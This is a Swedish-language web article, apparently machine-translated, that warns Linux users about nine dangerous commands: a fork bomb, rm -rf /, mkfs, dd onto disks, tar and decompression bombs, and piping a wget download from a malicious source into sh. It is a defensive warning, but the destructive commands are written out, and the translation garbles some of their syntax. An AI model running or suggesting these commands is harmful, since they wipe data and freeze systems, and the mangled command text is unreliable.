Hemsida » Desktop » 9 Linux kommandon och koder att vara försiktig med

    9 Linux kommandon och koder att vara försiktig med

    Linux shell / terminal kommandon är mycket kraftfulla och bara ett enkelt kommando kan leda till att man raderar en mapp, filer eller rotmapp, etc..

    I vissa fall kommer Linux inte ens att fråga dig om bekräftelse utan att det kommer att utföra kommandot direkt och orsaka dig förlora värdefull data och information lagras i dessa filer och mappar.

    Det är vanligt att människor lägger upp innehåll på webben rekommendera nya Linux-användare att utföra dessa kommandon. Det kan tyckas som ett skämt för någon som har lagt upp innehållet men det är ingen skratta för personen i andra änden.

    Vi har samlat några Linux-kommandon som är ganska skadliga för ditt system för att hjälpa dig att undvika dem. Tänk på att de verkligen är farliga och kan till och med ändras på olika sätt för att producera nya kommandon att åstadkomma mer skada.

    En viktig sak att notera är det några av dessa kommandon är bara farliga om de är prefixade med sudo på Ubuntu. Medan andra distributioner av Linux är, kommer de flesta av dessa givna kommandon att vara farliga att utföra som root.

    Ta en titt på 9 kommandon och koder du borde undvika att exekvera.

    1. Linux Fork Bomb Command

    : () : |: & ;: också känd som Gaffelbomb är en attack mot ett Linux-system. : () : |: & ;: är en bash funktion. En gång utförd, det upprepar sig flera gånger tills systemet fryser.

    Du kan bara bli av med det genom att starta om systemet. Var därför försiktig när du utför det här kommandot på ditt Linux-skal.

    2. MV-mapp / dev / null-kommando

    mv mapp / dev / null är ett annat riskabelt kommando. Dev / null eller nollanordning är en enhetsfil som kasserar alla data som är skrivna på den men det rapporterar att skrivoperationen utförs framgångsrikt. Det är också känt som bit bucked eller svart hål.

    3. rm-rf kommando

    rm-rf kommandot är ett snabbt sätt att Ta bort en mapp och dess innehåll i Linux-operativsystemet. Om du inte vet hur du använder det ordentligt kan det bli mycket farligt för systemet. De vanligaste kombinationerna och alternativen som används med kommandot rm-rf anges nedan:

    • rm Kommando används för att ta bort filerna i Linux-systemet.
    • rm -f Kommandot tar bort skrivskyddade filer i mappen utan att fråga.
    • rm -r kommandot tar bort innehållet i en mapp rekursivt.
    • rm -d Kommando används för att ta bort en tom katalog men det kommer att vägra att ta bort katalogen om den inte är tom.
    • rm-rf / kommando används för tvungen borttagning (det tar bort det även om det är skrivskyddat) av allt innehåll i rotkatalog och undermappar.
    • rm-rf * Kommandot används för att tvinga bort allt innehåll i den aktuella katalogen (katalog du arbetar för närvarande) och undermappar.
    • rm-rf. kommandot används för att tvinga bort allt innehåll i nuvarande mapp och undermappar. De rm-r. [^.] * kommandot kan också användas.
    • rm -i Kommandot används för att ta bort filer och mappar, men en prompten kommer att visas före avlägsnandet.

    4. mkfs kommando

    mkfs kan vara ett farligt kommando för ditt Linux-baserade system om du inte vet dess syfte. Allt som skrivs efter mkfs kommer att formateras och ersättas av ett tomt Linux-filsystem.

    Alla kommandon som nämns nedan kommer att formatera hårddisken och det kräver administratörsrättigheter:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    Kommandot mkfs.cramfs kommer att göra samma sak som ovan men det kräver inte administratörsrättigheter att utföra.

    5. Tjära bombardera

    De tjära kommando används för att kombinera flera filer till en enda fil (arkiverad fil) i .tjära formatera. Ett tejparkiv (Tar) -bomb kan skapas med det här kommandot.

    Det är en arkivfil som exploderar till tusentals eller miljontals filer med namn som liknar befintliga filer i den aktuella katalogen snarare än till en ny katalog när den inte är upptagen.

    Du kan undvika att bli offer för en tjärbomb av Skapa regelbundet en ny skyddskatalog när du tar emot en tar-fil och sedan flytta den mottagna tjärfilen till den här katalogen före untarring.

    Om tjärfilen verkligen är en tjärbomb så kan du helt enkelt ta bort den nyskapade katalogen för att bli av med den. Ett annat sätt att undvika explosionen av en tjärbomb är via de -t möjlighet att lista hela innehållet i en tjärfil för att ge dig en uppfattning om vilken typ av innehåll som finns i tjärfilen.

    6. dd-kommandot

    De dd kommando är van att kopiera och konvertera hårddiskpartitioner. Det kan dock visa sig vara skadligt om du anger fel destination.

    Kommandot kan vara någon av dessa:

    • dd om = / dev / hda av = / dev / hdb
    • dd om = / dev / hda av = / dev / sdb
    • dd om = något av = / dev / hda
    • dd om = något av = / dev / sda

    Följande kommando nollställer hela den primära hårddisken: dd om = / dev / noll av = / dev / hade

    7. Shell Script Code

    Någon kan utsätta dig för vilket ger dig länken till ett skalskript och godkänner att du hämtar och kör det. Skriptet kan innehålla någon skadlig eller farlig kod inuti. De kommandoformat kan se så här ut: wget http: // some_malicious_source -O- | sh. De wget kommer hämta skriptet medan sh hämtar manuset exekvering.

    8. skadlig källkod

    Någon ger dig källkoden och ber dig att kompilera den. Koden kan verka som en vanlig kod, men i själva verket är någon skadlig kod förtäckt i den stora källkoden och det kan skada ditt system. För att undvika att bli offer av denna typ av attack, acceptera och kompilera endast källkoden från pålitliga källor.

    9. Decompression Bomb

    Du har fått en komprimerad fil och du blir ombedd att extrahera den här filen, som verkar vara mycket liten i storlek men kan vara några KB. Faktiskt, den här komprimerade filen med liten storlek innehåller mycket komprimerad data.

    När filen är dekomprimerad, extraheras hundratals GB data som kan fylla i hårddisken för att minska prestandan i ditt system. För att undvika denna situation, kom alltid ihåg att acceptera data från pålitliga källor.